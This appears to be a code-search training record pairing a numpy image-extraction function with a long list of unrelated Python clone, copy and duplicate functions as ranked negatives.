            mc.parent(new_jnt, new_jnts[-1])

        new_jnts.append(new_jnt)

    return new_jnts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def skeleton_buildDuplicateChain(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = None, singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = cgmMeta.validateObjListArg(l_joints,'cgmObject',setClass=True)\n \n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n \n if cgmType is False:\n ATTR.delete(mJnt.mNode,'cgmType')\n elif cgmType:\n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_source[i].mNode,'sourceJoint',\"{0}Joint\".format(connectToSource))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n log.debug(ml_joints)\n return ml_joints", "def skeleton_duplicateJoint(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = 'skinJoint', singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in 
ml_source],po=True,ic=True,rc=True)\n \n ml_joints = [cgmMeta.cgmObject(j) for j in l_joints]\n\n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n if cgmType is not None:\n #l_names[i]['cgmType'] = cgmType \n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_joints[i].mNode,connectToSource,'{0}Joint'.format(modifier))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n return ml_joints", "def clone(self, *args):\n return _osgAnimation.Bone_clone(self, *args)", "def clone(self):", "def addChain(self, chain):\n\n\t\tself.chain.append(chain)\n\t\tchain.parentMolecule = self", "def duplicate(self, to_robot=None):\n _robot = self._related_robot_instance\n self.unlink_from_robot()\n out = deepcopy(self)\n if _robot is not None:\n self.link_with_robot(_robot)\n if to_robot is not None:\n out.link_with_robot(to_robot)\n return out", "def __copy__(self):\n #new = MCTS(copy=True) # don't run _predict() twice\n new = MCTS(self.env, copy=True) # don't set pi and Q twice\n new.env = self.env.__copy__()\n # can't use __dict__.update() without effecting env __copy__()\n # in theory, you don't need to copy the env. just use one copy for simulating, and restore it to root\n # since _Q() evaluates the env.done() of children, you need self.done = env.done() in __init__()\n # same for env.winner\n new.pi = []\n new. 
Q = 0\n new.net = self.net\n new.t = self.t\n new.expl = self.expl\n new.children = []\n new.parent = None\n return new", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def clone(self):\n screen = self.screen\n self._newLine(self._drawing)\n\n Myturtle = self.Myturtle\n self.screen = None\n self.Myturtle = None # too make self deepcopy-able\n\n q = deepcopy(self)\n\n self.screen = screen\n self.Myturtle = Myturtle\n\n q.screen = screen\n q.Myturtle = _TurtleImage(screen, self.Myturtle.shapeIndex)\n\n screen._turtles.append(q)\n ttype = screen._shapes[self.Myturtle.shapeIndex]._type\n if ttype == \"polygon\":\n q.Myturtle._item = screen._createpoly()\n elif ttype == \"image\":\n q.Myturtle._item = screen._createimage(screen._shapes[\"blank\"]._data)\n elif ttype == \"compound\":\n q.Myturtle._item = [screen._createpoly() for item in\n screen._shapes[self.Myturtle.shapeIndex]._data]\n q.currentLineItem = screen._createline()\n q._update()\n return q", "def clone(self):\n return _libsbml.Association_clone(self)", "def T_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"T_joint\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"T_joint\"] = \\\n self.joint_syms[joint_name][\"Tlocal_joint\"]\n else:\n self.joint_syms[joint_name][\"T_joint\"] = (\n self.T_joint_chain(parent_joint_name)\n * self.joint_syms[joint_name][\"Tlocal_joint\"]\n )\n return self.joint_syms[joint_name][\"T_joint\"]", "def copy(self):\n new = self.__class__()\n do_not_copy_by_ref = {\"alleles\", \"strains\", \"base_cobra_model\", \"notes\",\n \"annotation\"}\n for attr in self.__dict__:\n if attr not in do_not_copy_by_ref:\n new.__dict__[attr] = self.__dict__[attr]\n new.notes = deepcopy(self.notes)\n new.annotation = deepcopy(self.annotation)\n\n new.alleles = DictList()\n do_not_copy_by_ref = {\"_strains\", \"_model\"}\n for allele in self.alleles:\n new_allele = allele.__class__()\n for attr, value in iteritems(allele.__dict__):\n if attr not in do_not_copy_by_ref:\n new_allele.__dict__[attr] = copy(\n value) if attr == \"formula\" else value\n new_allele._model = new\n new.alleles.append(new_allele)\n\n new.strains = DictList()\n do_not_copy_by_ref = {\"_model\", \"_alleles\", \"_base_cobra_model\"}\n for strain in self.strains:\n new_strain = strain.__class__()\n for attr, value in iteritems(strain.__dict__):\n if attr not in do_not_copy_by_ref:\n new_strain.__dict__[attr] = copy(value)\n new_strain._model = new\n new.strains.append(new_strain)\n # update awareness\n for allele, stoic in iteritems(strain._alleles):\n new_allele = new.alleles.get_by_id(allele.id)\n new_strain._alleles[new_allele] = stoic\n new_allele._strain.add(new_strain)\n # it doesn't make sense to retain the context of a copied model so\n # assign a new empty context\n new._contexts = list()", "def copy(self, newname=None):\n\n if not newname: newname = self.name + \"_copy\"\n newmol=Protein(name=newname, parent=self.parent,\n elementType=self.elementType, childrenName=self.childrenName,\n setClass=self.setClass, childrenSetClass=self.childrenSetClass,\n top=self.top)\n newmol.curChain=Chain()\n newmol.curRes=Residue()\n newmol.allAtoms= AtomSet()\n newmol.parser = self.parser\n for at in self.allAtoms:\n self._fit_atom_into_tree(newmol, 
at)\n newmol.buildBondsByDistance()\n return newmol", "def __deepcopy__(self, memo):\n chain = Chain(model_id = self.model_id,\n chain_id = self.chain_id)\n for fragment in self.fragment_list:\n chain.add_fragment(copy.deepcopy(fragment, memo), True)\n return chain", "def deep_copy(self):\n return self.__class__(self.inputs, self.outputs, self.middle)", "def op_dup(self, args):\n self.require_stack(1)\n self.stack.append(self.stack[-1])", "def duplicate(self):\n\t\treturn Graph(self.vertices[:], self.edges[:])", "def trip_chain(self):\n pass", "def clone(self):\n return self.__class__(self.name, *self)", "def duplicate(*args, inputConnections: bool=True, instanceLeaf: bool=True, name: AnyStr=\"\",\n parentOnly: bool=True, renameChildren: bool=True, returnRootsOnly: bool=True,\n smartTransform: bool=True, transformsOnly: bool=True, upstreamNodes: bool=True,\n **kwargs)->List[AnyStr]:\n pass", "def clone(self):\n newlist = []\n for a in self.actors:\n newlist.append(a.clone())\n return Assembly(newlist)", "def clone(self):\n return _libsbml.XMLTriple_clone(self)", "def clone(self):\n return _libsbml.GeneProductAssociation_clone(self)", "def copy(self):\n model_copy = BayesianModel()\n model_copy.add_nodes_from(self.nodes())\n model_copy.add_edges_from(self.edges())\n if self.cpds:\n model_copy.add_cpds(*[cpd.copy() for cpd in self.cpds])\n return model_copy", "def clone(self, replica=None):\n\n\t\tif replica == None:\n\t\t\treplica = Molecule()\n\n\t\treplica.copy(self)\n\n\t\tfor chain in self.chain:\n\t\t\tnewchain = chain.clone()\n\t\t\treplica.addChain(newchain)\n\n\t\treturn replica", "def copy(self):\n new_chain = []\n for block in self.chain:\n if block.index == 0:\n new_chain.append(self.create_genesis())\n else:\n new_block = Block()\n new_block.deserialize(block.serialize())\n new_chain.append(new_block)\n\n return BlockChain(new_chain)", "def test_deepcopy(self):\n t = Compose([Enumerate([2, \"asfa\", \"ipsi\"]), OneHotEncode(3)], \"categorical\")\n t.transform([2])\n copy.deepcopy(t)", "def W_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"W\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"W\"] = \\\n self.joint_syms[joint_name][\"q_rpy\"]\n else:\n self.joint_syms[joint_name][\"W\"] = (\n self.W_joint_chain(parent_joint_name)\n + self.joint_syms[joint_name][\"q_rpy\"]\n )\n return self.joint_syms[joint_name][\"W\"]", "def polyDuplicateAndConnect(*args, removeOriginalFromShaders: bool=True, renameChildren:\n bool=True, **kwargs)->None:\n pass", "def clone(self):\n raise NotImplementedError", "def _chain(self, **kwargs):\n obj = self._clone()\n obj.__dict__.update(kwargs)\n return obj", "def subdDuplicateAndConnect(*args, **kwargs)->None:\n pass", "def duplicate(self, duplicate):\n\n self._duplicate = duplicate", "def duplicate_slide(source, target, index):\n source_slide = source.slides[index]\n blank_slide_layout = _get_blank_slide_layout(target)\n dest = target.slides.add_slide(blank_slide_layout)\n\n for shape in source_slide.shapes:\n newel = deepcopy(shape.element)\n dest.shapes._spTree.insert_element_before(newel, 'p:extLst')", "def clone(self):\n sc=copy.copy(self)\n sc.farms=list()\n for f in self.farms:\n sc.farms.append(f.clone(f.name, f.size))\n sc.airborne=list()\n for a in self.airborne:\n sc.airborne.append(a.clone(a.farma, a.farmb, a.distance))\n return sc", "def _interconnect(self):\n 
self.clear_structure()\n self.structure.append(self.source)\n for i in range(len(self.stack)):\n self.structure.append(self.stack[i])\n self.structure.append(self.terminator)\n return", "def clone(self) -> \"Activation\":\n clone = Activation()\n clone.package = self.package\n clone.identifiers = self.identifiers.clone()\n return clone", "def joint(self):\n return GraphModel(self.factors).joint()", "def crossover (self, p1, p2, p_pop, c1, c2, c_pop) :\n assert self.crossover_count < self.pop_size\n assert self.get_iteration () == self.last_gen\n self.parents.append (p1)\n self.parents.append (p2)\n self.crossover_count += 2\n if self.crossover_count == self.pop_size :\n assert (self.get_iteration () == self.last_gen)\n print (self.get_iteration ())\n sys.stdout.flush ()\n self.build_model (p_pop)\n self.sample_model (c1, c2, c_pop)\n self.crossover_count = 0\n self.parents = []\n self.children = {}\n self.last_gen += 1\n self.clear_cache ()", "def copy(self, exterior=None, label=None, **kwargs):\n return self.deepcopy(exterior=exterior, label=label, **kwargs)", "def duplicate(self, delayed):\n return self.__class__(delayed)", "def test_BuildModel1(self):\n print(\"\\nTest 5: Building a Model with cloning\")\n builder = StaticBuilder(\"Clone\")\n in1 = builder.addInput(10)\n enc1 = builder.addInner(3)\n out1 = builder.addOutput(name=\"Out1\")\n out2 = builder.addOutput(name=\"Out2\")\n \n builder.addDirectedLink(in1, enc1)\n builder.addDirectedLink(enc1, out1)\n builder.addDirectedLink(enc1, out2)\n \n builder.build()", "def clone(self):\n return self", "def __copy__(self):\r\n other = self.__class__(\r\n linkers=[copy(l) for l in self.linkers],\r\n wrapper=self.wrapper)\r\n return other", "def chain_new(ctx, chain_name):\n project = ctx.obj['PROJECT']\n new_local_chain(project.project_dir, chain_name)", "def addJointMoverToOutliner(self):\n\n pass", "def copy(self):\n new = self.__class__(integration=None, data=None)\n for attribute, value in self.__dict__.items():\n if attribute in self.referenced_attributes:\n setattr(new, attribute, value)\n elif hasattr(value, 'copy'):\n setattr(new, attribute, value.copy())\n else:\n setattr(new, attribute, deepcopy(value))\n return new", "def clone(self):\n\n clone = self.__class__.__new__(self.__class__)\n clone._graph_state = self._graph_state\n clone._molecule_state = self._molecule_state\n return clone", "def __duplicate_o2o_fields(self, duplicate):\n for f in self._meta.related_objects:\n if f.one_to_one:\n if any(\n [\n f.name in self._clone_o2o_fields\n and f not in self._meta.concrete_fields,\n self._clone_excluded_o2o_fields\n and f.name not in self._clone_excluded_o2o_fields\n and f not in self._meta.concrete_fields,\n ]\n ):\n rel_object = getattr(self, f.name, None)\n if rel_object:\n new_rel_object = CloneMixin._create_copy_of_instance(\n rel_object,\n force=True,\n sub_clone=True,\n )\n setattr(new_rel_object, f.remote_field.name, duplicate)\n new_rel_object.save()\n\n return duplicate", "def make_clone(self, attrs=None, sub_clone=False):\n attrs = attrs or {}\n if not self.pk:\n raise ValidationError(\n \"{}: Instance must be saved before it can be cloned.\".format(\n self.__class__.__name__\n )\n )\n if sub_clone:\n duplicate = self\n duplicate.pk = None\n else:\n duplicate = self._create_copy_of_instance(self)\n\n for name, value in attrs.items():\n setattr(duplicate, name, value)\n\n duplicate.save()\n\n duplicate = self.__duplicate_o2o_fields(duplicate)\n duplicate = self.__duplicate_o2m_fields(duplicate)\n duplicate = 
self.__duplicate_m2o_fields(duplicate)\n duplicate = self.__duplicate_m2m_fields(duplicate)\n return duplicate", "def clone(self):\n raise GAError, 'must define clone() in your genome class'", "def clone(self):\n return _libsbml.Objective_clone(self)", "def copy(self):", "def duplicate(self):\n\n return Note(self.nbr, self.length, self.vel)", "def newChain(self):\n\n\t\tmychain = Chain()\n\t\tself.addChain(mychain)\n\t\treturn mychain", "def add_chain(self, chain, delay_sort=False):\n assert isinstance(chain, Chain)\n\n if self.chain_dict.has_key(chain.chain_id):\n raise ChainOverwrite()\n\n self.chain_list.append(chain)\n self.chain_dict[chain.chain_id] = chain\n chain.model = self\n\n if not delay_sort:\n self.chain_list.sort()", "def DuplicateObject(self, node, new_obj_name):\n self.Add(node.object_module.GetName(), new_obj_name, obj=node.GetObject())\n node.ClearObject()", "def copy(self):\n return self.__class__(*self.sets)", "def duplicate(self):\r\n graph = DistanceGraph(self.size)\r\n for node in self.edges:\r\n for edge in self.edges[node]:\r\n graph.edges[node][edge] = self.edges[node][edge]\r\n return graph", "def adapt_chain(chain):\n type_chain = check_type(chain)\n name = chain.id\n if type_chain == \"nucleic_acid\":\n new_chain = Bio.PDB.Chain.Chain(name)\n chain = copy.copy(chain)\n for residue in chain:\n new_chain.add(residue.copy())\n\n for residue in new_chain:\n for atom in residue:\n if atom.id == \"C1'\":\n atom.id = \"CA\"\n residue.add(atom.copy())\n return new_chain\n else:\n return chain", "def chain_graph(self) -> nx.DiGraph:\n edg_lst = [\n (f\"p{idx}\", f\"p{idx+1}\", self.a[f\"p{idx+1}\"]) for idx in range(self.n)\n ]\n chain_graph = nx.DiGraph()\n chain_graph.add_weighted_edges_from(edg_lst)\n return chain_graph", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def clone(self) -> Mutator:\n raise NotImplementedError", "def clone(self):\n return _libsbml.GeneAssociation_clone(self)", "def connectJoint(*args, connectMode: bool=True, parentMode: bool=True, **kwargs)->None:\n pass", "def _clone_rip(self, memo):\n # references lists of definitions need to be vacated except those that were cloned.\n for definition in self._definitions:\n new_references = set()\n for ref in definition._references:\n if ref in memo.values():\n new_references.add(ref)\n for instance in definition._children:\n instance._reference._references.add(instance)\n\n definition._references = new_references", "def copy(self):\n return MultiterminalDevice(\n self.center.copy(),\n list(i.copy() for i in self.leads),\n list(i.copy() for i in self.connections),\n )", "def duplicate(self, dropped):\n return self.__class__(dropped, self.message)", "def append(self, traj):\n if hasattr(traj, 'trajid'):\n self.trajectories.append(traj)\n self.trajids.append(traj.trajid)\n self.trajcount = len(self.trajectories)", "def clone(self):\n return None", "def clone(self):\n return _libsbml.FbcAssociation_clone(self)", "def cloneType(self):\n return _osgAnimation.Bone_cloneType(self)", "def chain_graph(self) -> nx.DiGraph:\n edg_lst = [\n (f\"p{idx}\", f\"p{idx+1}\", self.d[f\"p{idx+1}\"]) for idx in range(self.n)\n ]\n chain_graph = nx.DiGraph()\n chain_graph.add_weighted_edges_from(edg_lst)\n return chain_graph", "def add(self, member, clone=True):\n if type(member)==Member:\n if clone:\n member = dict([(x,y) for x,y in member.getMember().items()])\n else:\n if self.head:\n self.tail.setLink(member)\n self.tail = member\n else:\n self.tail = member\n self.head = member 
\n if type(member)==dict:\n temp = Member()\n temp.setMember(member)\n member = temp\n if self.head:\n self.tail.setLink(member)\n self.tail = member\n else:\n self.tail = member\n self.head = member", "def test_check_duplication_entry_at_restoring_one_chain(self):\n ref_entity = Entity.objects.create(name=\"ReferredEntity\", created_user=self._user)\n ref_entries = [\n Entry.objects.create(name=\"ref-%d\" % i, created_user=self._user, schema=ref_entity)\n for i in range(3)\n ]\n\n # initialize EntityAttrs\n attr_info = {\n \"obj\": {\"type\": AttrTypeValue[\"object\"], \"value\": ref_entries[0]},\n \"arr_obj\": {\n \"type\": AttrTypeValue[\"array_object\"],\n \"value\": ref_entries[1:],\n },\n }\n for attr_name, info in attr_info.items():\n # create EntityAttr object with is_delete_in_chain object\n attr = EntityAttr.objects.create(\n name=attr_name,\n type=info[\"type\"],\n is_delete_in_chain=True,\n created_user=self._user,\n parent_entity=self._entity,\n )\n\n if info[\"type\"] & AttrTypeValue[\"object\"]:\n attr.referral.add(ref_entity)\n\n self._entity.attrs.add(attr)\n\n # initialize target entry\n entry = Entry.objects.create(name=\"entry\", schema=self._entity, created_user=self._user)\n entry.complement_attrs(self._user)\n\n for attr_name, info in attr_info.items():\n attr = entry.attrs.get(schema__name=attr_name)\n attr.add_value(self._user, info[\"value\"])\n\n # delete target entry at first\n entry.delete()\n\n # create same name entry\n Entry.objects.create(name=\"ref-1\", created_user=self._user, schema=ref_entity)\n\n # check duplicate entry\n ret = entry.check_duplication_entry_at_restoring(entry_chain=[])\n self.assertTrue(ret)", "def copy(self) -> 'Line':\n new = Line([cell.copy() for cell in self.cells], self.player)\n new.player_1, new.player_2 = self.player_1, self.player_2\n return new", "def clone(self):\n cloned = Graph()\n for v in self.vertices:\n cloned.vertices[v] = self.vertices[v].clone()\n return cloned", "def copy(self):\n return self.__class__(self.name, list(self.gRNAs))", "def clone_setup(self, setup_id):\n setup = Setup.objects.get(id=setup_id)\n setup.pk = None # copy all fields except the primary key (id)\n setup.date = datetime.now()\n\n i = 1\n\n while len(Setup.objects.filter(name=setup.name + \" (\" + str(i) + \")\")) != 0:\n i = i + 1\n\n setup.name += \" (\" + str(i) + \")\"\n\n if setup.status == \"final\":\n setup.status = \"draft\"\n setup.save()\n\n new_subspaces = Subspace.objects.filter(setup_id=setup_id)\n\n for subspace in new_subspaces:\n subspace.setup_id = setup\n subspace.pk = None\n subspace.save()\n\n return Setup.objects.get(pk=setup.pk)", "def copy(self):\n return self.__class__(**vars(self))", "def add_chain_to_model(chain, model, atoms):\n\n if chain[\"type\"] == \"polymer\" or chain[\"type\"] == \"branched\":\n polymer = {\n \"internal_id\": chain[\"internal_id\"], \"sequence\": chain[\"sequence\"],\n \"helices\": [], \"strands\": [], \"residues\": {}\n }\n for i, group in enumerate(chain[\"groups\"], start=1):\n add_het_to_dict(group, chain, atoms, polymer[\"residues\"], number=i)\n add_ss_to_chain(polymer)\n model[\"polymer\"][chain[\"id\"]] = polymer\n else:\n for group in chain[\"groups\"]:\n add_het_to_dict(group, chain, atoms, model[chain[\"type\"]])", "def remember_copy(self, original_name, new_name):\n\n if not any(History.try_add_child(branch, original_name, new_name) for branch in self.__history):\n new_branch = History.new_node(original_name)\n History.try_add_child(new_branch, original_name, new_name)\n 
self.__history.append(new_branch)", "def insert_chain(G, A, B, n):\r\n # Convert A and B node to str if necessary\r\n if not isinstance(A, str) or not isinstance(B, str):\r\n A = str(A)\r\n B = str(B)\r\n\r\n chain = nx.path_graph(n) # Create chain of repeaters of length n\r\n\r\n # Get position of A and B, and find the distance between each repeater\r\n posA = nx.get_node_attributes(G, 'pos')[A]\r\n posB = nx.get_node_attributes(G, 'pos')[B]\r\n step = np.subtract(posB, posA)\r\n\r\n # Assign position to each repeater\r\n repeater_distance = np.round(step / (n + 1), 10)\r\n try:\r\n pert = global_file.params.pert\r\n except AttributeError:\r\n pert = 0\r\n for i in chain.nodes():\r\n posNode = np.add(posA, np.multiply((i + 1), repeater_distance))\r\n x_offset = random.uniform(-pert, pert)\r\n y_offset = random.uniform(-pert, pert)\r\n chain.nodes[i]['pos'] = tuple(np.around(np.add(posNode, (x_offset, y_offset)), 4))\r\n # Create new chain with nodes AB1, AB2,... ABN\r\n named_nodes = [A + B + str(i + 1) for i in chain.nodes()]\r\n # Create mapping from old node names to new names\r\n mapping = dict(zip(chain.nodes(), named_nodes))\r\n # Relabel the node names of the chain\r\n chain = nx.relabel_nodes(chain, mapping)\r\n\r\n # First remove the long edge connecting A and B, and replace by repeater\r\n # chain\r\n G.remove_edge(str(A), str(B))\r\n # Add the edges from the chain including properties to the graph G\r\n G.add_edges_from(chain.edges(data=True))\r\n # Add the nodes from the chain including properties to the graph G\r\n G.add_nodes_from(chain.nodes(data=True))\r\n\r\n # Connect the chain to the graph by connecting A to AB1 and ABN to B\r\n G.add_edges_from([(str(A), str(A) + str(B) + '1'),\r\n (str(B), str(A) + str(B) + str(n))])\r\n\r\n return G", "def copy(self):\n return type(self)(self.parent(), self._express)", "def copy(self):\n cls = self.__class__\n new_graph = cls.__new__(cls)\n new_graph._nodes = self._nodes[:]\n new_graph._node_wip = self._node_wip[:]\n new_graph._edges = self._edges[:]\n if self._sorted_nodes:\n new_graph._sorted_nodes = self._sorted_nodes[:]\n else:\n new_graph._sorted_nodes = None\n new_graph.predecessors = {}\n for key, val in self.predecessors.items():\n new_graph.predecessors[key] = self.predecessors[key][:]\n new_graph.successors = {}\n for key, val in self.successors.items():\n new_graph.successors[key] = self.successors[key][:]\n return new_graph", "def add_clone(self, dest, source=None):\n raise NotImplementedYet()", "def clone(self):\n return _libsbml.FluxObjective_clone(self)", "def Clone(self):\n return _gmat_py.NadirPointing_Clone(self)", "def test_deepcopy(self):\n t = Identity()\n t.transform([2])\n copy.deepcopy(t)", "def test_deepcopy(self):\n t = Precision()\n t.transform([2])\n copy.deepcopy(t)", "def copy(self):\n return PathPoint(self.species.new_species(), deepcopy(self.constraints))", "def _replicate_class(self, **kwargs):\n return Posterior(**kwargs)", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def clone(self):\n # copy an instance of the class\n clone = empty_copy(self)\n\n for k in self.__dict__.keys():\n if k not in [\"move_stack\", \"_stack\"]:\n setattr(clone, k, self.__dict__[k])\n else:\n setattr(clone, k, [])\n\n clone.occupied_co = deepcopy(self.occupied_co)\n\n return clone", "def test_deepcopy(self):\n t = Quantize()\n t.transform([2])\n copy.deepcopy(t)", "def duplicateNode(self):\n\n try:\n self.__duplicate(nuke.selectedNode())\n except:\n nuke.message(\"Error - no node selected\")", "def 
add_link(self, other):\r\n self.neighbors.append(other)\r\n other.neighbors.append(self)", "def gapJunctionWith(self, otherObject, *args, **keywordArgs):\n \n from neuron import Neuron\n if isinstance(otherObject, Neuron) and otherObject.network == self.network:\n otherNeurite = otherObject.extendNeurite()\n elif isinstance(otherObject, Neurite) and otherObject.network == self.network:\n otherNeurite = otherObject\n else:\n raise ValueError, 'Gap junctions can only be made with neurons or neurites in the same network.'\n gapJunction = GapJunction(self.network, self, otherNeurite, *args, **keywordArgs)\n self._gapJunctions += [gapJunction]\n otherNeurite._gapJunctions += [gapJunction]\n self.network.addObject(gapJunction)\n return gapJunction", "def clone_graph(source_graph, target_graph=None, identifier=None):\n if target_graph is None:\n g = rdflib.Graph(identifier=identifier)\n for p, n in source_graph.namespace_manager.namespaces():\n g.namespace_manager.bind(p, n, override=True, replace=True)\n else:\n g = target_graph\n for p, n in source_graph.namespace_manager.namespaces():\n g.namespace_manager.bind(p, n, override=False, replace=False)\n for t in iter(source_graph):\n g.add(t)\n return g", "def __deepcopy__(self, others={}):\n miniMe = self.__class__.__new__(self.__class__)\n others[id(self)] = miniMe\n for key, val in self.__dict__.items():\n if id(val) in others:\n setattr(miniMe, key, others[id(val)])\n else:\n new = deepcopy(val, others)\n others[id(val)] = new\n setattr(miniMe, key, new)\n if miniMe.package:\n miniMe._addOurselvesToPackage(self.path)\n return miniMe" ]
[ "0.63030636", "0.6269034", "0.60625374", "0.58090156", "0.5777003", "0.57204974", "0.56585926", "0.55766195", "0.5560866", "0.55120313", "0.5510162", "0.54400694", "0.5433781", "0.54283494", "0.5389344", "0.5383912", "0.53801215", "0.53679395", "0.5365678", "0.5365056", "0.53536135", "0.53531176", "0.5330423", "0.5328828", "0.5323335", "0.5277563", "0.52724487", "0.52718264", "0.52692497", "0.5265826", "0.52514803", "0.5247242", "0.5241791", "0.5224864", "0.52229595", "0.5221577", "0.52143764", "0.5208162", "0.52070653", "0.5202716", "0.52009374", "0.5199416", "0.5198552", "0.5183921", "0.51799387", "0.517841", "0.5168683", "0.51470065", "0.51432586", "0.5134406", "0.51312244", "0.5127607", "0.5123178", "0.51197886", "0.5113165", "0.5111288", "0.5100488", "0.50896716", "0.5076351", "0.5073096", "0.50609595", "0.50560826", "0.50430036", "0.50412893", "0.5040321", "0.503996", "0.5039583", "0.5035546", "0.5028805", "0.50232285", "0.5019607", "0.5006594", "0.5006118", "0.50019854", "0.49962887", "0.49947977", "0.49915105", "0.49901", "0.4981155", "0.49781415", "0.4968591", "0.4957498", "0.49459642", "0.49418178", "0.49391577", "0.49355814", "0.49345753", "0.49338016", "0.4932179", "0.49312863", "0.4930886", "0.4929403", "0.49292108", "0.4928554", "0.49270058", "0.4925003", "0.4916579", "0.49124882", "0.49092108", "0.49075106" ]
0.6813391
0
Extract the images into a 4D uint8 numpy array [index, y, x, depth].
def extract_images(filename, lx):
    print('Extracting', filename, 'aaaaaa')
    data = numpy.loadtxt(filename, dtype='int64')
    dim = data.shape[0]
    data = data.reshape(dim, lx, lx, 1)
    # Convert shape from [num examples, rows, columns, depth]
    # to [num examples, rows*columns] (assuming depth == 1)
    data = data.reshape(data.shape[0], data.shape[1] * data.shape[2])
    # Convert from [0, 255] -> [0.0, 1.0].
    data = data.astype(numpy.float64)
    # images = numpy.multiply(images, 1.0 / 255.0)  # commented since it is ising variables
    data = numpy.multiply(data, 1.0)  # multiply by one, instead
    print(data.shape)
    return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
